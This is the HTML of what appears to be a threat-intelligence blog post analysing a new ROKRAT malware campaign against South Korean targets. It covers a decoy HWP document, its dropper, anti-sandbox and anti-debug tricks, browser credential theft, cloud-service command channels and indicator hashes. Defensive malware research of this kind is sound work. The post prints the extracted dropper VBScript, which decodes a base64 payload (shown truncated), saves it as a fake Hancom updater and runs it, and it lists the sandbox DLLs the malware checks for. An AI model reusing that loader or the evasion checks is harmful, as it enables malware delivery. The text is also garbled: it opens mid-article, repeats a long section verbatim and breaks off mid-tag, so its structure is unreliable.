src=βhttps://4.bp.blogspot.com/-ThSGoJ2fiL8/WhyCFM6M3SI/AAAAAAAAAMo/kS5m9vVHIhUAhkMPEhb-YiPH5-WISQ0hgCLcBGAs/s640/image10.pngβ width=β640β /></a></div><br />The graph flow of the ROKRAT variant:<br /><div><a href=βhttps://2.bp.blogspot.com/-sshO1piH2Z4/WhyCKaO_YUI/AAAAAAAAAMs/T-ioks5MAWQP9yqvUiBKHLO88h3IIGBQgCLcBGAs/s1600/image13.pngβ><img height=β450β src=βhttps://2.bp.blogspot.com/-sshO1piH2Z4/WhyCKaO_YUI/AAAAAAAAAMs/T-ioks5MAWQP9yqvUiBKHLO88h3IIGBQgCLcBGAs/s640/image13.pngβ width=β640β /></a></div><br />The graph flows are 99% similar. Additionally, the machine type is described with the following strings:<br /><div><a href=βhttps://4.bp.blogspot.com/-P3vttCd3--8/WhyCQUU2stI/AAAAAAAAAMw/yqLRBtpi1DUNwbOJ8WiPWn9nC3rtishggCLcBGAs/s1600/image8.pngβ><img height=β254β src=βhttps://4.bp.blogspot.com/-P3vttCd3--8/WhyCQUU2stI/AAAAAAAAAMw/yqLRBtpi1DUNwbOJ8WiPWn9nC3rtishggCLcBGAs/s640/image8.pngβ width=β640β /></a></div><br />The code appears to be based on this <a href=βhttp://www.rohitab.com/discuss/topic/35915-win32-api-to-get-system-information/?p%3D10075283β>forum</a> post describing the use of the Win32 APIs used. The source code only considers the following type:<br /><pre>default: lpString = β(Other)β; break;<br />case 0x02: lpString = β(Unknown)β; break;<br />case 0x03: lpString = β(Desktop)β; break;<br />case 0x04: lpString = β(Low Profile Desktop)β; break;<br />case 0x06: lpString = β(Mini Tower)β; break;<br />case 0x07: lpString = β(Tower)β; break;<br />case 0x08: lpString = β(Portable)β; break;<br />case 0x09: lpString = β(Laptop)β; break;<br />case 0x0A: lpString = β(Notebook)β; break;<br />case 0x0E: lpString = β(Sub Notebook)β; break;<br /></pre>Notice the () used by the ROKRAT author too. Some values are ignored as we can see from the <a href=βhttp://www.dmtf.org/sites/default/files/standards/documents/DSP0134_2.7.0.pdfβ>SMBIOS documentation</a>:<br /><div><a href=βhttps://2.bp.blogspot.com/-0Ere0jsIaBM/WhyCWDThHsI/AAAAAAAAAM0/hGb9Yd4MiZ85bo8q1mlGuZ8VzRrFI690wCLcBGAs/s1600/image19.pngβ><img height=β640β src=βhttps://2.bp.blogspot.com/-0Ere0jsIaBM/WhyCWDThHsI/AAAAAAAAAM0/hGb9Yd4MiZ85bo8q1mlGuZ8VzRrFI690wCLcBGAs/s640/image19.pngβ width=β478β /></a></div><br />The missing values are also omitted from the forum post.<br /><br />Another similarity is the PDB path. The βEvil New Yearβ sample contained the following PDB path: <br /><ul><li><pre>e:\Happy\Work\Source\version 12\T+M\Result\DocPrint.pdb</pre></li></ul>This new ROKRAT variant contains the following PDB:<br /><ul><li><pre>d:\HighSchool\version 13\2ndBD\T+M\T+M\Result\DocPrint.pdb</pre></li></ul>We clearly have the similar pattern.<br /><h3>Anti-Sandbox</h3><br />This ROKRAT variant contain anti-sandbox tricks. This is performed by checking if the following libraries are loaded:<br /><br /><ul><li>SbieDll.dll (sandboxie library)</li><li>Dbghelp.dll (Microsoft debugging tools)</li><li>Api_log.dll (threatAnalyzer / GFI SandBox)</li><li>Dir_watch.dll (threatAnalyzer / GFI SandBox)</li></ul><div><a href=βhttps://3.bp.blogspot.com/-tMpcUMOjVY4/WhyCeLjiTtI/AAAAAAAAAM4/55qQDK6rByglGRQeSmTpw6kLM3ksCkJ9QCLcBGAs/s1600/image4.pngβ><img height=β374β src=βhttps://3.bp.blogspot.com/-tMpcUMOjVY4/WhyCeLjiTtI/AAAAAAAAAM4/55qQDK6rByglGRQeSmTpw6kLM3ksCkJ9QCLcBGAs/s640/image4.pngβ width=β640β /></a></div><h3>Anti-Debug</h3><br />This ROKRAT version contains anti-debug tricks. For example it uses the following NOP technique:<br /><div><a href=βhttps://2.bp.blogspot.com/--2thdwNFFWk/WhyCxluop1I/AAAAAAAAANA/ZvScFYWEfmEX8V0XKU8Ab3e6RR9Nl3vFACLcBGAs/s1600/image5.pngβ><img height=β438β src=βhttps://2.bp.blogspot.com/--2thdwNFFWk/WhyCxluop1I/AAAAAAAAANA/ZvScFYWEfmEX8V0XKU8Ab3e6RR9Nl3vFACLcBGAs/s640/image5.pngβ width=β640β /></a></div><br />nop dword ptr [eax+eax+00h] is a 5 bytes NOP: 0x0F1F440000. But this opcode is not correctly supported by Immunity Debugger, the assembly is replaced by β???β in red in the screenshot:<br /><div><a href=βhttps://1.bp.blogspot.com/-FOQkjTQlNvA/WhyC3zsnVTI/AAAAAAAAANE/WmpI7gwqSBM75SG_ls-3cHjVzcKC50JTgCLcBGAs/s1600/image2.pngβ><img height=β322β src=βhttps://1.bp.blogspot.com/-FOQkjTQlNvA/WhyC3zsnVTI/AAAAAAAAANE/WmpI7gwqSBM75SG_ls-3cHjVzcKC50JTgCLcBGAs/s640/image2.pngβ width=β640β /></a></div><h3>Screenshots Feature</h3><br />The two ROKRAT versions performed screenshots. Itβs interesting to note similarities between the two versions. Especially the filename of the saved screenshot, here is the April ROKRAT version:<br /><div><a href=βhttps://2.bp.blogspot.com/-9U3juJSttOw/WhyC_xXCS7I/AAAAAAAAANI/QFDm3a7rfxQcmAM_ly8YHcSBuD4WW6FegCLcBGAs/s1600/image17.pngβ><img height=β640β src=βhttps://2.bp.blogspot.com/-9U3juJSttOw/WhyC_xXCS7I/AAAAAAAAANI/QFDm3a7rfxQcmAM_ly8YHcSBuD4WW6FegCLcBGAs/s640/image17.pngβ width=β488β /></a></div><br />And the code of the November version:<br /><div><a href=βhttps://1.bp.blogspot.com/--n6yXqONkEs/WhyDFe5MlnI/AAAAAAAAANM/3XsNWR3OdBUI3VK6FQLIhAGsopYx4WT5ACLcBGAs/s1600/image11.pngβ><img height=β586β src=βhttps://1.bp.blogspot.com/--n6yXqONkEs/WhyDFe5MlnI/AAAAAAAAANM/3XsNWR3OdBUI3VK6FQLIhAGsopYx4WT5ACLcBGAs/s640/image11.pngβ width=β640β /></a></div><br />The pattern is exactly the same: %s%04X%04X.tmp. The two %04X are random values. And the %s contains a temporary path (obtained with GetTempPath()). In both sample, the string length is 0x12C (300). This part is clearly a copy-paste.<br /><h3>Browser Password Stealer</h3><br />One of the analysed November ROKRAT samples contained a browser stealing capability. The malware is able to extract the stored passwords from Internet Explorer, Chrome and Firefox. For Chrome and Firefox, the malware queries the sqlite database containing the URL, username and password:<br /><div><a href=βhttps://2.bp.blogspot.com/-1c4E_cI5198/WhyDL5Xq05I/AAAAAAAAANQ/pkyAlBQDvAgq3n9AX1XpGuRd8uLEQhbVACLcBGAs/s1600/image3.pngβ><img height=β276β src=βhttps://2.bp.blogspot.com/-1c4E_cI5198/WhyDL5Xq05I/AAAAAAAAANQ/pkyAlBQDvAgq3n9AX1XpGuRd8uLEQhbVACLcBGAs/s640/image3.pngβ width=β640β /></a></div><br />Additionally, ROKRAT supports the Microsoft Vault mechanism. Vault was implemented in Windows 7, it contains any sensitive data (like the credentials) of Internet Explorer. Here is the initialization of the Vault APIs:<br /><div><a href=βhttps://2.bp.blogspot.com/-kgM45XXgNKw/WhyDSVHJD5I/AAAAAAAAANY/y18ZaMeY3XAiJJt0c2qUT88YUc-HQfPtACLcBGAs/s1600/image14.pngβ><img height=β640β src=βhttps://2.bp.blogspot.com/-kgM45XXgNKw/WhyDSVHJD5I/AAAAAAAAANY/y18ZaMeY3XAiJJt0c2qUT88YUc-HQfPtACLcBGAs/s640/image14.pngβ width=β390β /></a></div><br />The ROKRAT implementation is largely based on the <a href=βhttps://www.codeproject.com/Articles/1167943/The-Secrets-of-Internet-Explorer-Credentialsβ>following project</a>. This is a change of tactic for ROKRAT when compared with previous samples/versions. This time the actor is specifically targeting information which would be used for additional compromises and maybe even on potential personal accounts. The method used by the ROKRAT actors was also out of the ordinary as they embedded the whole SQLite library into their executable to allow the SQLite browsing attempts used for Firefox & Google Chrome.<br /><br />During our investigation, we discovered that the browser password stealer code is exactly the same as the code used during the <a href=βhttps://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/β>FreeMilk</a> campaign described by Unit 42. In this article, the author already noticed C2 infrastructure overlap between FreeMilk and ROKRAT. In addition, we can add that some code overlap is present between the 2 samples:<br /><div><a href=βhttps://1.bp.blogspot.com/-wgeOLIL7OBQ/WhyDX-7egxI/AAAAAAAAANc/bj86udF7beAhD0Q3kWPDDLsJPNjWn-FBwCLcBGAs/s1600/image12.pngβ><img height=β408β src=βhttps://1.bp.blogspot.com/-wgeOLIL7OBQ/WhyDX-7egxI/AAAAAAAAANc/bj86udF7beAhD0Q3kWPDDLsJPNjWn-FBwCLcBGAs/s640/image12.pngβ width=β640β /></a></div><br />On the left, we have the ROKRAT sample and on the right the FreeMilk sample. We can notice that in addition to the code, the author copy-pasted English typos such as βIE Registeryβ.<br /><h3>Cloud Platforms Used As C&C</h3><br />Finally, this ROKRAT version uses cloud platforms in exactly the same way as our previous analysis. This time, the author did not use social network platforms, but different cloud providers:<br /><br /><ul><li><div></div><h4>pcloud</h4></li></ul><ul></ul><div><a href=βhttps://3.bp.blogspot.com/-PrgljjxiAFo/WhyEcoSdFdI/AAAAAAAAAN4/bdK6iwGJ8moRLm9NDzv_5CVZx82QlV0NQCLcBGAs/s1600/image18.pngβ><img height=β640β src=βhttps://3.bp.blogspot.com/-PrgljjxiAFo/WhyEcoSdFdI/AAAAAAAAAN4/bdK6iwGJ8moRLm9NDzv_5CVZx82QlV0NQCLcBGAs/s640/image18.pngβ width=β550β /></a></div><br /><br /><ul><li><h4>Box</h4></li></ul><div><a href=βhttps://1.bp.blogspot.com/-mEPlwuN1nzk/WhyEywpiFYI/AAAAAAAAAOA/WJFSGK8Ylp8IQE6Vru-WMQWd57IGHsBkwCLcBGAs/s1600/image15.pngβ><img height=β294β src=βhttps://1.bp.blogspot.com/-mEPlwuN1nzk/WhyEywpiFYI/AAAAAAAAAOA/WJFSGK8Ylp8IQE6Vru-WMQWd57IGHsBkwCLcBGAs/s640/image15.pngβ width=β640β /></a></div><div><br /></div><ul><li><h4>Dropbox</h4></li></ul><div><a href=βhttps://3.bp.blogspot.com/-DFU-dyBrdNg/WhyFAJdvf6I/AAAAAAAAAOM/oP6_ri4qfBQZa3-1tuSvysODAQyRZT73gCLcBGAs/s1600/image9.pngβ><img height=β458β src=βhttps://3.bp.blogspot.com/-DFU-dyBrdNg/WhyFAJdvf6I/AAAAAAAAAOM/oP6_ri4qfBQZa3-1tuSvysODAQyRZT73gCLcBGAs/s640/image9.pngβ width=β640β /></a></div><ul><li><h4>Yandex</h4></li></ul><div><a href=βhttps://4.bp.blogspot.com/-obpjJED7PA8/WhyFL04Jk0I/AAAAAAAAAOQ/5c1siYoQcdAt8UgR9YIuTXiawtZlN1DhACLcBGAs/s1600/image16.pngβ><img height=β276β src=βhttps://4.bp.blogspot.com/-obpjJED7PA8/WhyFL04Jk0I/AAAAAAAAAOQ/5c1siYoQcdAt8UgR9YIuTXiawtZlN1DhACLcBGAs/s640/image16.pngβ width=β640β /></a></div><div><br /></div><h2>Conclusion</h2><br />This campaign shows that the actor behind ROKRAT is still active. Based on the PDB, it could be the 13th version of this malware. This actor made the decision only to use legitimate cloud platforms, but changed some from the last incarnation. From an attackerβs perspective itβs an interesting choice, the flow is encrypted by default with HTTPS and the malicious flow can be difficult to find in the middle of legitimate traffic to these platforms. We can also determine that the actor likes to use code already available on the internet in various repositories we mentioned throughout this post ie; GitHub, Code Project and other public forums.<br /><br />Based on source code copy-paste, we remain highly confident that the author of ROKRAT is also behind, or working with those behind, the FreeMilk spear phishing campaign. This is further proven by the fact that ROKRAT shares code with Freenki downloader used in the FreeMilk campaign.<br /><br />Moreover, the actor is always interested by the same pattern of targets, the decoy documents refer to precise elements related to the geopolitical situation between North and South Korea. Generally, the documents reference the Ministry of Unification or the situation of North Korean citizens. They frequently contain specific references to real meetings or conferences, showing a high knowledge of current events in North and South Korea.<br /><br />Together this information helps us to understand the profile of the targeted systems and the interests of the threat actor.<br /><br /><h2>Coverage</h2><br />Additional ways our customers can detect and block this threat are listed below.<br /><div><a href=βhttps://3.bp.blogspot.com/-h3Ubgz2tpKo/WhyDpf-abzI/AAAAAAAAANk/QXJs9157NFcro7ZHWf36KsfFiQ2yjgazgCLcBGAs/s1600/image1.pngβ><img src=βhttps://3.bp.blogspot.com/-h3Ubgz2tpKo/WhyDpf-abzI/AAAAAAAAANk/QXJs9157NFcro7ZHWf36KsfFiQ2yjgazgCLcBGAs/s1600/image1.pngβ /></a></div>Advanced Malware Protection (<a href=βhttps://www.cisco.com/c/en/us/products/security/advanced-malware-protectionβ>AMP</a>) is ideally suited to prevent the execution of the malware used by these threat actors.<br /><br /><a href=βhttps://www.cisco.com/c/en/us/products/security/cloud-web-security/index.htmlβ>CWS</a> or<a href=βhttps://www.cisco.com/c/en/us/products/security/web-security-appliance/index.htmlβ> WSA</a> web scanning prevents access to malicious websites and detects malware used in these attacks.<br /><br /><a href=βhttps://www.cisco.com/c/en/us/products/security/email-security-appliance/index.htmlβ>Email Security</a> can block malicious emails sent by threat actors as part of their campaign.<br /><br />Network Security appliances such as<a href=βhttps://www.cisco.com/c/en/us/products/security/firewalls/index.htmlβ> </a><a href=βhttps://www.cisco.com/c/en/us/products/security/firewalls/index.htmlβ>NGFW</a>,<a href=βhttps://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.htmlβ> </a><a href=βhttps://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.htmlβ>NGIPS</a>, and<a href=βhttps://meraki.cisco.com/products/appliancesβ> </a><a href=βhttps://meraki.cisco.com/products/appliancesβ>Meraki MX</a> can detect malicious activity associated with this threat.<br /><br /><a href=βhttps://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.htmlβ>AMP Threat Grid</a> helps identify malicious binaries and build protection into all Cisco Security products.<br /><br /><a href=βhttps://umbrella.cisco.com/β>Umbrella</a>, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.<br /><br />Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on <a href=βhttps://www.snort.org/productsβ>Snort.org</a>.<br /><br /><h2>IOCs</h2><br />Path: c:\ProgramData\HncModuleUpdate.exe<br />MalDoc: 171e26822421f7ed2e34cc092eaeba8a504b5d576c7fd54aa6975c2e2db0f824<br />Dropper #1: a29b07a6fe5d7ce3147dd7ef1d7d18df16e347f37282c43139d53cce25ae7037<br />Dropper #2: eb6d25e08b2b32a736b57f8df22db6d03dc82f16da554f4e8bb67120eacb1d14<br />Dropper #3: 9b383ebc1c592d5556fec9d513223d4f99a5061591671db560faf742dd68493f<br />ROKRAT: b3de3f9309b2f320738772353eb724a0782a1fc2c912483c036c303389307e2e<br />Freenki: 99c1b4887d96cb94f32b280c1039b3a7e39ad996859ffa6dd011cf3cca4f1ba5<div>
<a href=βhttp://feeds.feedburner.com/~ff/feedburner/Talos?a=fAmkhLaUPK8:-FWTXT_BreY:yIl2AUoC8zAβ><img src=βhttp://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zAβ></img></a>
</div><img src=βhttp://feeds.feedburner.com/~r/feedburner/Talos/~4/fAmkhLaUPK8β height=β1β width=β1β alt />
ROKRAT Reloaded
<div></div><div>This post was authored by <a href=βhttps://www.twitter.com/SecurityBeard/β>Warren Mercer</a>, <a href=βhttps://www.twitter.com/r00tbsdβ>Paul Rascagneres</a> and with contributions from Jungsoo An.</div><div><br /></div><h2>Executive Summary</h2><br />Earlier this year, Talos published 2 articles concerning South Korean threats. The <a href=βhttp://blog.talosintelligence.com/2017/02/korean-maldoc.htmlβ>first one</a> was about the use of a malicious HWP document which dropped downloaders used to retrieve malicious payloads on several compromised websites. One of the website was a compromised government website. We named this case βEvil New Yearsβ. The <a href=βhttp://blog.talosintelligence.com/2017/04/introducing-rokrat.htmlβ>second one</a> was about the analysis and discovery of the ROKRAT malware.<br /><br />This month, Talos discovered a new ROKRAT version. This version contains technical elements that link the two previous articles. This new sample contains code from the two publications earlier this year:<br /><br /><ul><li>It contains the same reconnaissance code used;</li><li>Similar PDB pattern that the βEvil New Yearsβ samples used;</li><li>it contains the same cloud features and similar copy-paste methods that ROKRAT used;</li><li>It uses cloud platform as C&C but not exactly the same. This version uses pcloud, box, dropbox and yandex.</li></ul><br /><a></a><br /><br />We also discovered that this new version of ROKRAT shares code with Freenki, a downloader used in the FreeMilk campaign. <br /><br />The campaign started, unsurprisingly, with a malicious HWP document. This document was alleged to be written by a lawyer who claims to represent the βCitizensβ Alliance for North Korean Human Rights and Reunification of Korean Peninsulaβ. It mentions a meeting of this group that took place the 1st of November at Seoul. Due to the content of this malicious document we can assume that the targets are interested by the situation in North Korea. This malicious document drops and executes a new version of ROKRAT.<br /><br /><h2>HWP Malicious Document</h2><br />As with the previous ROKRAT campaigns we described the infection vector used with this actor is a malicious HWP document. The HWP files are created using Hangul Word Processor, a popular alternative to Microsoft Office for South Korean users developed by Hancom. Here is a screenshot of the malicious document:<br /><div><a href=βhttps://2.bp.blogspot.com/-oZY_XkhLCak/WhyBjcvv1DI/AAAAAAAAAMY/EtxUBxnlW0I7Zw5dvU4cVLCmMy3vVYzEwCLcBGAs/s1600/image7.pngβ><img height=β640β src=βhttps://2.bp.blogspot.com/-oZY_XkhLCak/WhyBjcvv1DI/AAAAAAAAAMY/EtxUBxnlW0I7Zw5dvU4cVLCmMy3vVYzEwCLcBGAs/s640/image7.pngβ width=β426β /></a></div><br />The malicious document mentions the βCommunity of North Korean human right and unificationβ. We first observed his campaign during November 2017. The document was alleged to be written by a lawyer who has been representing the community known as βμ¬μΈν΅ (μ¬λ°λ₯ΈλΆνμΈκΆλ²κ³Όν΅μΌμμνμλ―Όλͺ¨μ)β.<br /><br />The purpose of the document is to arrange a meeting to discuss about items which are related to βNorth Korean Human Rights Actβ and βEnactment of a lawβ which passed in last 2016 in South Korea.<br /><br />Based on the meeting date (1st Nov 2017), this decoy document could be delivered to the stakeholders in the community βμ¬μΈν΅β by pretending to be a request to join the discussion for finding better ideas/ways to let more people be interested in their activity before Nov 2017.<br /><br />The HWP file contains an OLE object named BIN0001.OLE. Once extracted and uncompressed (zlib), we obtain the following script:<br /><pre>const strEncode = βTVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hV[β¦redactedβ¦]AAAAAAAAAAAAAAAAAAAAAA=β<br />DIM outFile<br />DIM base64Decoded<br />DIM shell_obj<br />SET shell_obj = CreateObject(βWScript.Shellβ)<br />DIM fso<br />SET fso = CreateObject(βScripting.FileSystemObjectβ)<br />outFile = βc:\ProgramData\HncModuleUpdate.exeβ<br />base64Decoded = decodeBase64(strEncode)<br />IF NOT(fso.FileExists(outFile)) then<br />writeBytes outFile, base64Decoded<br />shell_obj.run outFile<br />END IF<br />WScript.Quit()<br />private function decodeBase64(base64)<br />DIM DM, EL<br />SET DM = CreateObject(βMicrosoft.XMLDOMβ)<br />SET EL = DM.createElement(βtmpβ)<br />EL.DataType = βbin.base64β<br />EL.Text = base64<br />decodeBase64 = EL.NodeTypedValue<br />end function<br />private Sub writeBytes(file, bytes)<br />DIM binaryStream<br />SET binaryStream = CreateObject(βADODB.Streamβ)<br />binaryStream.Type = 1<br />binaryStream.Open<br />binaryStream.Write bytes<br />binaryStream.SaveToFile file, 1<br />End Sub<br /></pre>The purpose is to decode, using the base64 algorithm, the content of the strEncode variable. The decoded data is stored in the c:\ProgramData\HncModuleUpdate.exe file and executed. The binary is the ROKRAT dropper. The specific filename βHncModuleUpdateβ may fool a user into thinking this is a Hancom software.<br /><br /><h2>Stage 1: Dropper</h2><br />The purpose of the dropper is to extract the resource named SBS. This resource contains malicious shellcode. Additionally, the dropper executes a new cmd.exe process, injects the extracted resource and executes it. The code injection is performed by the VirtualAlloc(), WriteProcessMemory() and CreateRemoteThread() APIs:<br /><div><a href=βhttps://4.bp.blogspot.com/-UK3O08XFp2k/WhyBximnWLI/AAAAAAAAAMc/s5N3fKQB__ks4xpcTOH6GtWfOMVzQS_TwCLcBGAs/s1600/image6.pngβ><img height=β640β src=βhttps://4.bp.blogspot.com/-UK3O08XFp2k/WhyBximnWLI/AAAAAAAAAMc/s5N3fKQB__ks4xpcTOH6GtWfOMVzQS_TwCLcBGAs/s640/image6.pngβ width=β508β /></a></div><br />Once executed, the shellcode will decoded a PE file, will load it in the memory of cmd.exe and finally will execute it. This payload is a new variant of ROKRAT.<br /><br />Additionally, one of the analysed droppers displays a picture to the user:<br /><div><a href=βhttps://2.bp.blogspot.com/-UdRh6pJR0FU/WhyB6um-i6I/AAAAAAAAAMg/Rujz_rpXM8AIMWxHayfmA7v0sdKxbxYawCLcBGAs/s1600/image20.pngβ><img height=β353β src=βhttps://2.bp.blogspot.com/-UdRh6pJR0FU/WhyB6um-i6I/AAAAAAAAAMg/Rujz_rpXM8AIMWxHayfmA7v0sdKxbxYawCLcBGAs/s400/image20.pngβ width=β400β /></a></div><br />The people in the pictures are about the Korean war and people related to independence troops during the βindependence movementβ. The image on the top left comes from <a href=βhttps://ko.wikipedia.org/wiki/λ°±μ μ½β>Wikipedia</a>. The picture in the middle left comes from <a href=βhttp://m.blog.daum.net/_blog/_m/articleView.do?blogid=0UCYA&articleno=1545β>this blog</a>. And the bottom left image comes from this <a href=βhttp://m.ohmynews.com/NWS_Web/Mobile/at_pg.aspx?CNTN_CD=A0000939170#cbβ>news website</a>. The decoy image seems to be a set of public pictures.<br /><br /><h2>Stage 2: ROKRAT</h2><h3>Similarities With the βEvil New Yearsβ MalDoc</h3><br />This variant of ROKRAT contains similar code with the βEvil New Yearsβ downloader. The information collected during the reconnaissance phase is similar. The malware uses the following registry key to get the machine type: HKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosData. The βSystem manufacturerβ value is used to identify the type of machine. Here is the graph flow of the βEvil New Yearsβ downloader:<br /><div><a href=βhttps://4.bp.blogspot.com/-ThSGoJ2fiL8/WhyCFM6M3SI/AAAAAAAAAMo/kS5m9vVHIhUAhkMPEhb-YiPH5-WISQ0hgCLcBGAs/s1600/image10.pngβ><img height=β452β src=βhttps://4.bp.blogspot.com/-ThSGoJ2fiL8/WhyCFM6M3SI/AAAAAAAAAMo/kS5m9vVHIhUAhkMPEhb-YiPH5-WISQ0hgCLcBGAs/s640/image10.pngβ width=β640β /></a></div><br />The graph flow of the ROKRAT variant:<br /><div><a href=βhttps://2.bp.blogspot.com/-sshO1piH2Z4/WhyCKaO_YUI/AAAAAAAAAMs/T-ioks5MAWQP9yqvUiBKHLO88h3IIGBQgCLcBGAs/s1600/image13.pngβ><img height=β450β src=βhttps://2.bp.blogspot.com/-sshO1piH2Z4/WhyCKaO_YUI/AAAAAAAAAMs/T-ioks5MAWQP9yqvUiBKHLO88h3IIGBQgCLcBGAs/s640/image13.pngβ width=β640β /></a></div><br />The graph flows are 99% similar. Additionally, the machine type is described with the following strings:<br /><div><a href=βhttps://4.bp.blogspot.com/-P3vttCd3--8/WhyCQUU2stI/AAAAAAAAAMw/yqLRBtpi1DUNwbOJ8WiPWn9nC3rtishggCLcBGAs/s1600/image8.pngβ><img height=β254β src=βhttps://4.bp.blogspot.com/-P3vttCd3--8/WhyCQUU2stI/AAAAAAAAAMw/yqLRBtpi1DUNwbOJ8WiPWn9nC3rtishggCLcBGAs/s640/image8.pngβ width=β640β /></a></div><br />The code appears to be based on this <a href=βhttp://www.rohitab.com/discuss/topic/35915-win32-api-to-get-system-information/?p%3D10075283β>forum</a> post describing the use of the Win32 APIs used. The source code only considers the following type:<br /><pre>default: lpString = β(Other)β; break;<br />case 0x02: lpString = β(Unknown)β; break;<br />case 0x03: lpString = β(Desktop)β; break;<br />case 0x04: lpString = β(Low Profile Desktop)β; break;<br />case 0x06: lpString = β(Mini Tower)β; break;<br />case 0x07: lpString = β(Tower)β; break;<br />case 0x08: lpString = β(Portable)β; break;<br />case 0x09: lpString = β(Laptop)β; break;<br />case 0x0A: lpString = β(Notebook)β; break;<br />case 0x0E: lpString = β(Sub Notebook)β; break;<br /></pre>Notice the () used by the ROKRAT author too. Some values are ignored as we can see from the <a href=βhttp://www.dmtf.org/sites/default/files/standards/documents/DSP0134_2.7.0.pdfβ>SMBIOS documentation</a>:<br /><div><a href=βhttps://2.bp.blogspot.com/-0Ere0jsIaBM/WhyCWDThHsI/AAAAAAAAAM0/hGb9Yd4MiZ85bo8q1mlGuZ8VzRrFI690wCLcBGAs/s1600/image19.pngβ><img height=β640β src=βhttps://2.bp.blogspot.com/-0Ere0jsIaBM/WhyCWDThHsI/AAAAAAAAAM0/hGb9Yd4MiZ85bo8q1mlGuZ8VzRrFI690wCLcBGAs/s640/image19.pngβ width=β478β /></a></div><br />The missing values are also omitted from the forum post.<br /><br />Another similarity is the PDB path. The βEvil New Yearβ sample contained the following PDB path: <br /><ul><li><pre>e:\Happy\Work\Source\version 12\T+M\Result\DocPrint.pdb</pre></li></ul>This new ROKRAT variant contains the following PDB:<br /><ul><li><pre>d:\HighSchool\version 13\2ndBD\T+M\T+M\Result\DocPrint.pdb</pre></li></ul>We clearly have the similar pattern.<br /><h3>Anti-Sandbox</h3><br />This ROKRAT variant contain anti-sandbox tricks. This is performed by checking if the following libraries are loaded:<br /><br /><ul><li>SbieDll.dll (sandboxie library)</li><li>Dbghelp.dll (Microsoft debugging tools)</li><li>Api_log.dll (threatAnalyzer / GFI SandBox)</li><li>Dir_watch.dll (threatAnalyzer / GFI SandBox)</li></ul><div><a href=βhttps://3.bp.blogspot.com/-tMpcUMOjVY4/WhyCeLjiTtI/AAAAAAAAAM4/55qQDK6rByglGRQeSmTpw6kLM3ksCkJ9QCLcBGAs/s1600/image4.pngβ><img height=β374β src=βhttps://3.bp.blogspot.com/-tMpcUMOjVY4/WhyCeLjiTtI/AAAAAAAAAM4/55qQDK6rByglGRQeSmTpw6kLM3ksCkJ9QCLcBGAs/s640/image4.pngβ width=β640β /></a></div><h3>Anti-Debug</h3><br />This ROKRAT version contains anti-debug tricks. For example it uses the following NOP technique:<br /><div><a href=βhttps://2.bp.blogspot.com/--2thdwNFFWk/WhyCxluop1I/AAAAAAAAANA/ZvScFYWEfmEX8V0XKU8Ab3e6RR9Nl3vFACLcBGAs/s1600/image5.pngβ><img height=β438β src=βhttps://2.bp.blogspot.com/--2thdwNFFWk/WhyCxluop1I/AAAAAAAAANA/ZvScFYWEfmEX8V0XKU8Ab3e6RR9Nl3vFACLcBGAs/s640/image5.pngβ width=β640β /></a></div><br />nop dword ptr [eax+eax+00h] is a 5 bytes NOP: 0x0F1F440000. But this opcode is not correctly supported by Immunity Debugger, the assembly is replaced by β???β in red in the screenshot:<br /><div><a href=βhttps://1.bp.blogspot.com/-FOQkjTQlNvA/WhyC3zsnVTI/AAAAAAAAANE/WmpI7gwqSBM75SG_ls-3cHjVzcKC50JTgCLcBGAs/s1600/image2.pngβ><img height=β322β src=βhttps://1.bp.blogspot.com/-FOQkjTQlNvA/WhyC3zsnVTI/AAAAAAAAANE/WmpI7gwqSBM75SG_ls-3cHjVzcKC50JTgCLcBGAs/s640/image2.pngβ width=β640β /></a></div><h3>Screenshots Feature</h3><br />The two ROKRAT versions performed screenshots. Itβs interesting to note similarities between the two versions. Especially the filename of the saved screenshot, here is the April ROKRAT version:<br /><div><a href=βhttps://2.bp.blogspot.com/-9U3juJSttOw/WhyC_xXCS7I/AAAAAAAAANI/QFDm3a7rfxQcmAM_ly8YHcSBuD4WW6FegCLcBGAs/s1600/image17.pngβ><img height=β640β src=βhttps://2.bp.blogspot.com/-9U3juJSttOw/WhyC_xXCS7I/AAAAAAAAANI/QFDm3a7rfxQcmAM_ly8YHcSBuD4WW6FegCLcBGAs/s640/image17.pngβ width=β488β /></a></div><br />And the code of the November version:<br /><div><a href=βhttps://1.bp.blogspot.com/--n6yXqONkEs/WhyDFe5MlnI/AAAAAAAAANM/3XsNWR3OdBUI3VK6FQLIhAGsopYx4WT5ACLcBGAs/s1600/image11.pngβ><img height=β586β src=βhttps://1.bp.blogspot.com/--n6yXqONkEs/WhyDFe5MlnI/AAAAAAAAANM/3XsNWR3OdBUI3VK6FQLIhAGsopYx4WT5ACLcBGAs/s640/image11.pngβ width=β640β /></a></div><br />The pattern is exactly the same: %s%04X%04X.tmp. The two %04X are random values. And the %s contains a temporary path (obtained with GetTempPath()). In both sample, the string length is 0x12C (300). This part is clearly a copy-paste.<br /><h3>Browser Password Stealer</h3><br />One of the analysed November ROKRAT samples contained a browser stealing capability. The malware is able to extract the stored passwords from Internet Explorer, Chrome and Firefox. For Chrome and Firefox, the malware queries the sqlite database containing the URL, username and password:<br /><div><a href=βhttps://2.bp.blogspot.com/-1c4E_cI5198/WhyDL5Xq05I/AAAAAAAAANQ/pkyAlBQDvAgq3n9AX1XpGuRd8uLEQhbVACLcBGAs/s1600/image3.pngβ><img height=β276β src=βhttps://2.bp.blogspot.com/-1c4E_cI5198/WhyDL5Xq05I/AAAAAAAAANQ/pkyAlBQDvAgq3n9AX1XpGuRd8uLEQhbVACLcBGAs/s640/image3.pngβ width=β640β /></a></div><br />Additionally, ROKRAT supports the Microsoft Vault mechanism. Vault was implemented in Windows 7, it contains any sensitive data (like the credentials) of Internet Explorer. Here is the initialization of the Vault APIs:<br /><div><a 